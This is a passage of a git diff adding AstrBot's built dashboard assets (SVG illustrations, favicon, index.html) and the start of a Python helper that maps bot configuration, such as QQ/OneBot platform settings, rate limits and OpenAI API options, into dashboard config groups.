<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(0.866041 -0.499972 -0.866041 -0.499972 333.683 387.578)" stroke="black"/>
|
||||
<line y1="-0.5" x2="390.089" y2="-0.5" transform="matrix(-0.866041 -0.499972 -0.866041 0.499972 671.516 197.527)" stroke="black"/>
|
||||
</g>
|
||||
</svg>
43  addons/dashboard/dist/assets/img-error-blue-2675a7a9.svg  vendored  Normal file
@@ -0,0 +1,43 @@
<svg width="676" height="395" viewBox="0 0 676 395" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<rect width="26.998" height="26.8293" transform="matrix(0.866041 -0.499972 0.866041 0.499972 361.873 290.126)" fill="#E3F2FD"/>
|
||||
<rect width="24.2748" height="24.1231" transform="matrix(0.866041 -0.499972 0.866041 0.499972 364.249 291.115)" fill="#90CAF9"/>
|
||||
<rect width="26.998" height="26.8293" transform="matrix(0.866041 -0.499972 0.866041 0.499972 291.67 86.4912)" fill="#E3F2FD"/>
|
||||
<rect width="24.2748" height="24.1231" transform="matrix(0.866041 -0.499972 0.866041 0.499972 294.046 87.48)" fill="#90CAF9"/>
|
||||
<g filter="url(#filter0_d)">
|
||||
<path d="M370.694 211.828L365.394 208.768V215.835L365.404 215.829C365.459 216.281 365.785 216.724 366.383 217.069L417.03 246.308C418.347 247.068 420.481 247.068 421.798 246.308L468.671 219.248C469.374 218.842 469.702 218.301 469.654 217.77V210.861L464.282 213.962L418.024 187.257C416.708 186.497 414.573 186.497 413.257 187.257L370.694 211.828Z" fill="url(#paint0_linear)"/>
|
||||
</g>
|
||||
<rect width="59.6284" height="63.9858" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 364 208.812)" fill="#90CAF9"/>
|
||||
<rect width="59.6284" height="63.9858" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 364 208.812)" fill="url(#paint1_linear)"/>
|
||||
<rect width="56.6816" height="60.8238" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 366.645 208.761)" fill="url(#paint2_linear)"/>
|
||||
<path d="M421.238 206.161C421.238 206.434 421.62 206.655 422.092 206.655L432.159 206.656C435.164 206.656 437.6 208.063 437.601 209.798C437.602 211.533 435.166 212.939 432.162 212.938L422.09 212.937C421.62 212.937 421.24 213.157 421.24 213.428L421.241 215.814C421.241 216.087 421.624 216.308 422.096 216.308L432.689 216.309C438.917 216.31 443.967 213.395 443.965 209.799C443.964 206.202 438.914 203.286 432.684 203.286L422.086 203.284C421.617 203.284 421.236 203.504 421.237 203.775L421.238 206.161Z" fill="#1E88E5"/>
|
||||
<path d="M413.422 213.43C413.422 213.157 413.039 212.936 412.567 212.936L402.896 212.935C399.891 212.935 397.455 211.528 397.454 209.793C397.453 208.059 399.889 206.652 402.894 206.653L412.57 206.654C413.039 206.654 413.419 206.435 413.419 206.164L413.418 203.777C413.418 203.504 413.035 203.283 412.563 203.283L402.366 203.282C396.138 203.281 391.089 206.197 391.09 209.793C391.091 213.389 396.141 216.305 402.371 216.306L412.573 216.307C413.042 216.307 413.423 216.088 413.423 215.817L413.422 213.43Z" fill="#1E88E5"/>
|
||||
<path d="M407.999 198.145L411.211 201.235C411.266 201.288 411.332 201.336 411.405 201.379C411.813 201.614 412.461 201.669 412.979 201.49C413.59 201.278 413.787 200.821 413.421 200.469L410.209 197.379C409.843 197.027 409.051 196.913 408.441 197.124C407.831 197.335 407.633 197.793 407.999 198.145Z" fill="#1E88E5"/>
|
||||
<path d="M416.235 200.853C416.235 201.058 416.38 201.244 416.613 201.379C416.846 201.513 417.168 201.597 417.524 201.597C418.236 201.596 418.813 201.263 418.813 200.852L418.812 197.021C418.811 196.61 418.234 196.277 417.522 196.277C416.811 196.278 416.234 196.611 416.234 197.022L416.235 200.853Z" fill="#1E88E5"/>
|
||||
<path d="M421.627 200.47C421.317 200.769 421.412 201.143 421.82 201.379C421.893 201.421 421.977 201.459 422.069 201.491C422.68 201.703 423.472 201.588 423.838 201.236L427.047 198.147C427.413 197.794 427.215 197.337 426.605 197.126C425.994 196.915 425.203 197.029 424.836 197.381L421.627 200.47Z" fill="#1E88E5"/>
|
||||
<path d="M427.056 221.447L423.844 218.357C423.478 218.005 422.686 217.891 422.076 218.102C421.466 218.314 421.268 218.771 421.634 219.123L424.846 222.213C424.901 222.266 424.967 222.314 425.04 222.357C425.448 222.592 426.097 222.647 426.614 222.468C427.225 222.257 427.423 221.799 427.056 221.447Z" fill="#1E88E5"/>
|
||||
<path d="M418.82 218.739C418.82 218.328 418.243 217.995 417.531 217.995C416.819 217.995 416.242 218.329 416.242 218.74L416.243 222.57C416.244 222.776 416.388 222.962 416.621 223.096C416.854 223.231 417.177 223.314 417.533 223.314C418.245 223.314 418.822 222.981 418.821 222.57L418.82 218.739Z" fill="#1E88E5"/>
|
||||
<path d="M413.428 219.122C413.794 218.77 413.596 218.312 412.986 218.101C412.375 217.89 411.584 218.004 411.217 218.356L408.008 221.445C407.698 221.744 407.793 222.118 408.201 222.354C408.274 222.396 408.358 222.434 408.45 222.466C409.061 222.678 409.853 222.563 410.219 222.211L413.428 219.122Z" fill="#1E88E5"/>
|
||||
<defs>
|
||||
<filter id="filter0_d" x="301.394" y="186.687" width="232.264" height="208.191" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
|
||||
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
|
||||
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"/>
|
||||
<feOffset dy="84"/>
|
||||
<feGaussianBlur stdDeviation="32"/>
|
||||
<feColorMatrix type="matrix" values="0 0 0 0 0.129412 0 0 0 0 0.588235 0 0 0 0 0.952941 0 0 0 0.2 0"/>
|
||||
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow"/>
|
||||
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow" result="shape"/>
|
||||
</filter>
|
||||
<linearGradient id="paint0_linear" x1="417.526" y1="205.789" x2="365.394" y2="216.782" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#2196F3"/>
|
||||
<stop offset="1" stop-color="#B1DCFF"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint1_linear" x1="0.503035" y1="2.68177" x2="20.3032" y2="42.2842" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#FAFAFA" stop-opacity="0.74"/>
|
||||
<stop offset="1" stop-color="#91CBFA"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint2_linear" x1="-18.5494" y1="-44.8799" x2="14.7845" y2="40.5766" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#FAFAFA" stop-opacity="0.74"/>
|
||||
<stop offset="1" stop-color="#91CBFA"/>
|
||||
</linearGradient>
|
||||
</defs>
|
||||
</svg>
42  addons/dashboard/dist/assets/img-error-purple-edee3fbc.svg  vendored  Normal file
@@ -0,0 +1,42 @@
<svg width="710" height="391" viewBox="0 0 710 391" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<rect width="26.9258" height="26.7576" transform="matrix(0.866041 -0.499972 0.866041 0.499972 161.088 154.333)" fill="#EDE7F6"/>
|
||||
<rect width="24.9267" height="24.7709" transform="matrix(0.866041 -0.499972 0.866041 0.499972 162.809 155.327)" fill="#B39DDB"/>
|
||||
<rect width="26.9258" height="26.7576" transform="matrix(0.866041 -0.499972 0.866041 0.499972 536.744 181.299)" fill="#EDE7F6"/>
|
||||
<rect width="24.9267" height="24.7709" transform="matrix(0.866041 -0.499972 0.866041 0.499972 538.465 182.292)" fill="#B39DDB"/>
|
||||
<g filter="url(#filter0_d)">
|
||||
<path d="M67.7237 137.573V134.673H64.009V140.824L64.0177 140.829C64.0367 141.477 64.4743 142.121 65.3305 142.615L103.641 164.733C105.393 165.744 108.232 165.744 109.983 164.733L204.044 110.431C204.879 109.949 205.316 109.324 205.355 108.693L205.355 108.692V108.68C205.358 108.628 205.358 108.576 205.355 108.523L205.362 102.335L200.065 104.472L165.733 84.6523C163.982 83.6413 161.142 83.6413 159.391 84.6523L67.7237 137.573Z" fill="url(#paint0_linear)"/>
|
||||
</g>
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="#673AB7"/>
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="url(#paint1_linear)" fill-opacity="0.3"/>
|
||||
<mask id="mask0" mask-type="alpha" maskUnits="userSpaceOnUse" x="64" y="78" width="141" height="81">
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="#673AB7"/>
|
||||
</mask>
|
||||
<g mask="url(#mask0)">
|
||||
</g>
|
||||
<mask id="mask1" mask-type="alpha" maskUnits="userSpaceOnUse" x="64" y="78" width="141" height="81">
|
||||
<rect width="115.933" height="51.5596" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 62.1588 134.683)" fill="#673AB7"/>
|
||||
</mask>
|
||||
<g mask="url(#mask1)">
|
||||
<rect width="64.3732" height="64.3732" rx="5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 111.303 81.6006)" fill="#5E35B1"/>
|
||||
<rect opacity="0.7" x="0.866041" width="63.3732" height="63.3732" rx="4.5" transform="matrix(0.866041 -0.499972 0.866041 0.499972 79.1848 87.8305)" stroke="#5E35B1"/>
|
||||
</g>
|
||||
<defs>
|
||||
<filter id="filter0_d" x="0.0090332" y="83.894" width="269.353" height="229.597" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB">
|
||||
<feFlood flood-opacity="0" result="BackgroundImageFix"/>
|
||||
<feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"/>
|
||||
<feOffset dy="84"/>
|
||||
<feGaussianBlur stdDeviation="32"/>
|
||||
<feColorMatrix type="matrix" values="0 0 0 0 0.403922 0 0 0 0 0.227451 0 0 0 0 0.717647 0 0 0 0.2 0"/>
|
||||
<feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow"/>
|
||||
<feBlend mode="normal" in="SourceGraphic" in2="effect1_dropShadow" result="shape"/>
|
||||
</filter>
|
||||
<linearGradient id="paint0_linear" x1="200.346" y1="102.359" x2="71.0293" y2="158.071" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#A491C8"/>
|
||||
<stop offset="1" stop-color="#D7C5F8"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint1_linear" x1="8.1531" y1="-0.145767" x2="57.1962" y2="72.3003" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="white"/>
|
||||
<stop offset="1" stop-color="white" stop-opacity="0"/>
|
||||
</linearGradient>
|
||||
</defs>
|
||||
</svg>
27  addons/dashboard/dist/assets/img-error-text-a6aebfa0.svg  vendored  Normal file
@@ -0,0 +1,27 @@
<svg width="676" height="391" viewBox="0 0 676 391" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<path d="M267.744 237.142L279.699 230.24L300.636 242.329L288.682 249.231L313.566 263.598L286.344 279.314L261.46 264.947L215.984 291.203L197.779 282.558L169.334 211.758L169.092 211.618L196.313 195.902L267.744 237.142ZM219.359 265.077L240.523 252.859L204.445 232.029L205.487 234.589L219.359 265.077Z" fill="#FFAB91"/>
|
||||
<path d="M469.959 120.206L481.913 113.304L502.851 125.392L490.897 132.294L515.78 146.661L488.559 162.377L463.675 148.011L418.199 174.266L399.994 165.621L371.548 94.8211L371.307 94.6816L398.528 78.9654L469.959 120.206ZM421.574 148.141L442.737 135.922L406.66 115.093L407.701 117.653L421.574 148.141Z" fill="#FFAB91"/>
|
||||
<path d="M204.523 235.027V232.237L219.401 265.014L240.555 252.926V255.018L218.936 267.339L204.523 235.027Z" fill="#D84315"/>
|
||||
<path d="M406.738 118.09V115.301L421.616 148.078L442.77 135.99V138.082L421.151 150.402L406.738 118.09Z" fill="#D84315"/>
|
||||
<rect width="109.114" height="136.405" transform="matrix(0.866025 -0.5 0.866025 0.5 220.507 181.925)" fill="url(#paint0_linear)"/>
|
||||
<rect width="40.2357" height="70.0545" transform="matrix(0.866025 -0.5 0.866025 0.5 280.437 201.886)" fill="url(#paint1_linear)"/>
|
||||
<rect x="25.1147" width="80.1144" height="107.405" transform="matrix(0.866025 -0.5 0.866025 0.5 223.872 194.482)" stroke="#1565C0" stroke-width="29"/>
|
||||
<rect x="25.1147" width="80.1144" height="107.405" transform="matrix(0.866025 -0.5 0.866025 0.5 223.872 194.482)" stroke="url(#paint2_linear)" stroke-width="29"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" d="M279.517 230.177L267.662 237.15L196.064 195.772L168.866 211.58L169.331 212.097L170.096 214.002L196.436 198.795L267.866 240.035L279.821 233.133L298.211 243.751L300.787 242.265L279.517 230.177ZM291.278 250.695L288.804 252.124L311.1 264.996L313.805 263.418L291.278 250.695Z" fill="#D84315"/>
|
||||
<path fill-rule="evenodd" clip-rule="evenodd" d="M481.732 113.24L469.877 120.214L398.279 78.8359L371.081 94.6433L371.546 95.1603L372.311 97.0652L398.651 81.8581L470.081 123.099L482.036 116.196L500.426 126.814L503.002 125.328L481.732 113.24ZM493.493 133.759L491.019 135.187L513.315 148.06L516.02 146.482L493.493 133.759Z" fill="#D84315"/>
|
||||
<path d="M288.674 252.229V249.207L291.929 251.067L288.674 252.229Z" fill="#D84315"/>
|
||||
<defs>
|
||||
<linearGradient id="paint0_linear" x1="77.7511" y1="139.902" x2="-10.8629" y2="8.75671" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#3076C8"/>
|
||||
<stop offset="0.992076" stop-color="#91CBFA"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint1_linear" x1="25.8162" y1="51.0447" x2="68.7073" y2="-5.41524" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="#2E75C7"/>
|
||||
<stop offset="1" stop-color="#4283CC"/>
|
||||
</linearGradient>
|
||||
<linearGradient id="paint2_linear" x1="-16.1224" y1="-47.972" x2="123.494" y2="290.853" gradientUnits="userSpaceOnUse">
|
||||
<stop stop-color="white"/>
|
||||
<stop offset="1" stop-color="white" stop-opacity="0"/>
|
||||
</linearGradient>
|
||||
</defs>
|
||||
</svg>
5  addons/dashboard/dist/assets/index-0f1523f3.css  vendored  Normal file
720  addons/dashboard/dist/assets/index-dc96e1be.js  vendored  Normal file
BIN  addons/dashboard/dist/assets/materialdesignicons-webfont-67d24abe.eot  vendored  Normal file
BIN  addons/dashboard/dist/assets/materialdesignicons-webfont-80bb28b3.woff  vendored  Normal file
BIN  addons/dashboard/dist/assets/materialdesignicons-webfont-a58ecb54.ttf  vendored  Normal file
BIN  addons/dashboard/dist/assets/materialdesignicons-webfont-c1c004a9.woff2  vendored  Normal file
9  addons/dashboard/dist/assets/md5-45627dcb.js  vendored  Normal file
6  addons/dashboard/dist/assets/social-google-a359a253.svg  vendored  Normal file
@@ -0,0 +1,6 @@
<svg width="22" height="22" viewBox="0 0 22 22" fill="none" xmlns="http://www.w3.org/2000/svg">
|
||||
<path d="M5.06129 13.2253L4.31871 15.9975L1.60458 16.0549C0.793457 14.5504 0.333374 12.8292 0.333374 11C0.333374 9.23119 0.763541 7.56319 1.52604 6.09448H1.52662L3.94296 6.53748L5.00146 8.93932C4.77992 9.58519 4.65917 10.2785 4.65917 11C4.65925 11.783 4.80108 12.5332 5.06129 13.2253Z" fill="#FBBB00"/>
|
||||
<path d="M21.4804 9.00732C21.6029 9.65257 21.6668 10.3189 21.6668 11C21.6668 11.7637 21.5865 12.5086 21.4335 13.2271C20.9143 15.6722 19.5575 17.8073 17.678 19.3182L17.6774 19.3177L14.6339 19.1624L14.2031 16.4734C15.4503 15.742 16.425 14.5974 16.9384 13.2271H11.2346V9.00732H17.0216H21.4804Z" fill="#518EF8"/>
|
||||
<path d="M17.6772 19.3176L17.6777 19.3182C15.8498 20.7875 13.5277 21.6666 11 21.6666C6.93783 21.6666 3.40612 19.3962 1.60449 16.0549L5.0612 13.2253C5.96199 15.6294 8.28112 17.3408 11 17.3408C12.1686 17.3408 13.2634 17.0249 14.2029 16.4734L17.6772 19.3176Z" fill="#28B446"/>
|
||||
<path d="M17.8085 2.78892L14.353 5.61792C13.3807 5.01017 12.2313 4.65908 11 4.65908C8.21963 4.65908 5.85713 6.44896 5.00146 8.93925L1.52658 6.09442H1.526C3.30125 2.67171 6.8775 0.333252 11 0.333252C13.5881 0.333252 15.9612 1.25517 17.8085 2.78892Z" fill="#F14336"/>
|
||||
</svg>
1  addons/dashboard/dist/favicon.svg  vendored  Normal file
@@ -0,0 +1 @@
<svg t="1702013028016" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="http://www.w3.org/2000/svg" p-id="1541" width="200" height="200"><path d="M0 0m204.8 0l614.4 0q204.8 0 204.8 204.8l0 614.4q0 204.8-204.8 204.8l-614.4 0q-204.8 0-204.8-204.8l0-614.4q0-204.8 204.8-204.8Z" fill="#FFEC9C" p-id="1542"></path><path d="M819.2 0H534.272A756.48 756.48 0 0 0 0 483.584V819.2a204.8 204.8 0 0 0 204.8 204.8h614.4a204.8 204.8 0 0 0 204.8-204.8V204.8a204.8 204.8 0 0 0-204.8-204.8z" fill="#FFE98A" p-id="1543"></path><path d="M819.2 0h-3.84a755.2 755.2 0 0 0-539.392 1024H819.2a204.8 204.8 0 0 0 204.8-204.8V204.8a204.8 204.8 0 0 0-204.8-204.8z" fill="#FFE471" p-id="1544"></path><path d="M497.152 721.152A752.384 752.384 0 0 0 560.384 1024H819.2a204.8 204.8 0 0 0 204.8-204.8V204.8a204.8 204.8 0 0 0-89.088-168.96 755.2 755.2 0 0 0-437.76 685.312z" fill="#FFE161" p-id="1545"></path><path d="M526.08 140.032l98.304 199.168L844.8 371.2a15.616 15.616 0 0 1 8.704 25.6l-159.744 156.16 37.632 219.136a15.616 15.616 0 0 1-22.528 16.384l-196.608-102.4-196.608 102.4a15.616 15.616 0 0 1-22.528-16.384l37.12-219.136-159.232-155.136a15.616 15.616 0 0 1 8.704-25.6l219.904-32 98.304-199.168a15.616 15.616 0 0 1 28.16-1.024z" fill="#FFF5CC" p-id="1546"></path><path d="M665.6 409.6a444.16 444.16 0 0 0 25.6-61.44l-65.536-9.472-99.584-198.656a15.616 15.616 0 0 0-27.904 0l-98.304 199.168L179.2 371.2a15.616 15.616 0 0 0-8.704 25.6l159.744 156.16-15.104 87.04A407.808 407.808 0 0 0 665.6 409.6z" fill="#FFFFFF" p-id="1547"></path></svg>
21  addons/dashboard/dist/index.html  vendored  Normal file
@@ -0,0 +1,21 @@
<!doctype html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <link rel="icon" href="/favicon.svg" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="keywords" content="AstrBot Soulter" />
    <meta name="description" content="AstrBot Dashboard" />
    <link
      rel="stylesheet"
      href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&family=Poppins:wght@400;500;600;700&family=Roboto:wght@400;500;700&display=swap"
    />
    <title>AstrBot - 仪表盘</title>
    <script type="module" crossorigin src="/assets/index-dc96e1be.js"></script>
    <link rel="stylesheet" href="/assets/index-0f1523f3.css">
  </head>
  <body>
    <div id="app"></div>

  </body>
</html>
533  addons/dashboard/helper.py  Normal file
@@ -0,0 +1,533 @@
from addons.dashboard.server import AstrBotDashBoard, DashBoardData
|
||||
from pydantic import BaseModel
|
||||
from typing import Union, Optional
|
||||
import uuid
|
||||
from util import general_utils as gu
|
||||
from util.cmd_config import CmdConfig
|
||||
from dataclasses import dataclass
|
||||
import sys
|
||||
import os
|
||||
import threading
|
||||
import time
|
||||
import asyncio
|
||||
from util.plugin_dev.api.v1.config import update_config
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
|
||||
@dataclass
|
||||
class DashBoardConfig():
|
||||
config_type: str
|
||||
name: Optional[str] = None
|
||||
description: Optional[str] = None
|
||||
path: Optional[str] = None # 仅 item 才需要
|
||||
body: Optional[list['DashBoardConfig']] = None # 仅 group 才需要
|
||||
value: Optional[Union[list, dict, str, int, bool]] = None # 仅 item 才需要
|
||||
val_type: Optional[str] = None # 仅 item 才需要
|
||||
|
||||
|
||||
class DashBoardHelper():
|
||||
def __init__(self, global_object, config: dict):
|
||||
self.loop = asyncio.new_event_loop()
|
||||
asyncio.set_event_loop(self.loop)
|
||||
dashboard_data = global_object.dashboard_data
|
||||
dashboard_data.configs = {
|
||||
"data": []
|
||||
}
|
||||
self.parse_default_config(dashboard_data, config)
|
||||
self.dashboard_data: DashBoardData = dashboard_data
|
||||
self.dashboard = AstrBotDashBoard(global_object)
|
||||
self.key_map = {} # key: uuid, value: config key name
|
||||
self.cc = CmdConfig()
|
||||
|
||||
@self.dashboard.register("post_configs")
|
||||
def on_post_configs(post_configs: dict):
|
||||
try:
|
||||
if 'base_config' in post_configs:
|
||||
self.save_config(
|
||||
post_configs['base_config'], namespace='') # 基础配置
|
||||
self.save_config(
|
||||
post_configs['config'], namespace=post_configs['namespace']) # 选定配置
|
||||
self.parse_default_config(
|
||||
self.dashboard_data, self.cc.get_all())
|
||||
# 重启
|
||||
threading.Thread(target=self.dashboard.shutdown_bot,
|
||||
args=(2,), daemon=True).start()
|
||||
except Exception as e:
|
||||
raise e
|
||||
|
||||
# 将 config.yaml、 中的配置解析到 dashboard_data.configs 中
|
||||
def parse_default_config(self, dashboard_data: DashBoardData, config: dict):
|
||||
|
||||
try:
|
||||
qq_official_platform_group = DashBoardConfig(
|
||||
config_type="group",
|
||||
name="QQ_OFFICIAL 平台配置",
|
||||
description="",
|
||||
body=[
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="启用 QQ_OFFICIAL 平台",
|
||||
description="官方的接口,仅支持 QQ 频道。详见 q.qq.com",
|
||||
value=config['qqbot']['enable'],
|
||||
path="qqbot.enable",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="QQ机器人APPID",
|
||||
description="详见 q.qq.com",
|
||||
value=config['qqbot']['appid'],
|
||||
path="qqbot.appid",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="QQ机器人令牌",
|
||||
description="详见 q.qq.com",
|
||||
value=config['qqbot']['token'],
|
||||
path="qqbot.token",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="QQ机器人 Secret",
|
||||
description="详见 q.qq.com",
|
||||
value=config['qqbot_secret'],
|
||||
path="qqbot_secret",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="是否允许 QQ 频道私聊",
|
||||
description="如果启用,机器人会响应私聊消息。",
|
||||
value=config['direct_message_mode'],
|
||||
path="direct_message_mode",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="是否接收QQ群消息",
|
||||
description="需要机器人有相应的群消息接收权限。在 q.qq.com 上查看。",
|
||||
value=config['qqofficial_enable_group_message'],
|
||||
path="qqofficial_enable_group_message",
|
||||
),
|
||||
]
|
||||
)
|
||||
qq_gocq_platform_group = DashBoardConfig(
|
||||
config_type="group",
|
||||
name="OneBot协议平台配置",
|
||||
description="",
|
||||
body=[
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="启用",
|
||||
description="支持cq-http、shamrock等(目前仅支持QQ平台)",
|
||||
value=config['gocqbot']['enable'],
|
||||
path="gocqbot.enable",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="HTTP 服务器地址",
|
||||
description="",
|
||||
value=config['gocq_host'],
|
||||
path="gocq_host",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="int",
|
||||
name="HTTP 服务器端口",
|
||||
description="",
|
||||
value=config['gocq_http_port'],
|
||||
path="gocq_http_port",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="int",
|
||||
name="WebSocket 服务器端口",
|
||||
description="目前仅支持正向 WebSocket",
|
||||
value=config['gocq_websocket_port'],
|
||||
path="gocq_websocket_port",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="是否响应群消息",
|
||||
description="",
|
||||
value=config['gocq_react_group'],
|
||||
path="gocq_react_group",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="是否响应私聊消息",
|
||||
description="",
|
||||
value=config['gocq_react_friend'],
|
||||
path="gocq_react_friend",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="是否响应群成员增加消息",
|
||||
description="",
|
||||
value=config['gocq_react_group_increase'],
|
||||
path="gocq_react_group_increase",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="是否响应频道消息",
|
||||
description="",
|
||||
value=config['gocq_react_guild'],
|
||||
path="gocq_react_guild",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="int",
|
||||
name="转发阈值(字符数)",
|
||||
description="机器人回复的消息长度超出这个值后,会被折叠成转发卡片发出以减少刷屏。",
|
||||
value=config['qq_forward_threshold'],
|
||||
path="qq_forward_threshold",
|
||||
),
|
||||
]
|
||||
)
|
||||
|
||||
general_platform_detail_group = DashBoardConfig(
|
||||
config_type="group",
|
||||
name="通用平台配置",
|
||||
description="",
|
||||
body=[
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="启动消息文字转图片",
|
||||
description="启动后,机器人会将消息转换为图片发送,以降低风控风险。",
|
||||
value=config['qq_pic_mode'],
|
||||
path="qq_pic_mode",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="int",
|
||||
name="消息限制时间",
|
||||
description="在此时间内,机器人不会回复同一个用户的消息。单位:秒",
|
||||
value=config['limit']['time'],
|
||||
path="limit.time",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="int",
|
||||
name="消息限制次数",
|
||||
description="在上面的时间内,如果用户发送消息超过此次数,则机器人不会回复。单位:次",
|
||||
value=config['limit']['count'],
|
||||
path="limit.count",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="回复前缀",
|
||||
description="[xxxx] 你好! 其中xxxx是你可以填写的前缀。如果为空则不显示。",
|
||||
value=config['reply_prefix'],
|
||||
path="reply_prefix",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="list",
|
||||
name="通用管理员用户 ID(支持多个管理员)。通过 !myid 指令获取。",
|
||||
description="",
|
||||
value=config['other_admins'],
|
||||
path="other_admins",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="bool",
|
||||
name="独立会话",
|
||||
description="是否启用独立会话模式,即 1 个用户自然账号 1 个会话。",
|
||||
value=config['uniqueSessionMode'],
|
||||
path="uniqueSessionMode",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="LLM 唤醒词",
|
||||
description="如果不为空, 那么只有当消息以此词开头时,才会调用大语言模型进行回复。如设置为 /chat,那么只有当消息以 /chat 开头时,才会调用大语言模型进行回复。",
|
||||
value=config['llm_wake_prefix'],
|
||||
path="llm_wake_prefix",
|
||||
)
|
||||
]
|
||||
)
|
||||
|
||||
openai_official_llm_group = DashBoardConfig(
|
||||
config_type="group",
|
||||
name="OpenAI 官方接口类设置",
|
||||
description="",
|
||||
body=[
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="list",
|
||||
name="OpenAI API Key",
|
||||
description="OpenAI API 的 Key。支持使用非官方但兼容的 API(第三方中转key)。",
|
||||
value=config['openai']['key'],
|
||||
path="openai.key",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="OpenAI API 节点地址(api base)",
|
||||
description="OpenAI API 的节点地址,配合非官方 API 使用。如果不想填写,那么请填写 none",
|
||||
value=config['openai']['api_base'],
|
||||
path="openai.api_base",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="str",
|
||||
name="OpenAI model",
|
||||
description="OpenAI LLM 模型。详见 https://platform.openai.com/docs/api-reference/chat",
|
||||
value=config['openai']['chatGPTConfigs']['model'],
|
||||
path="openai.chatGPTConfigs.model",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="int",
|
||||
name="OpenAI max_tokens",
|
||||
description="OpenAI 最大生成长度。详见 https://platform.openai.com/docs/api-reference/chat",
|
||||
value=config['openai']['chatGPTConfigs']['max_tokens'],
|
||||
path="openai.chatGPTConfigs.max_tokens",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="float",
|
||||
name="OpenAI temperature",
|
||||
description="OpenAI 温度。详见 https://platform.openai.com/docs/api-reference/chat",
|
||||
value=config['openai']['chatGPTConfigs']['temperature'],
|
||||
path="openai.chatGPTConfigs.temperature",
|
||||
),
|
||||
DashBoardConfig(
|
||||
config_type="item",
|
||||
val_type="float",
|
||||
name="OpenAI top_p",
|
||||
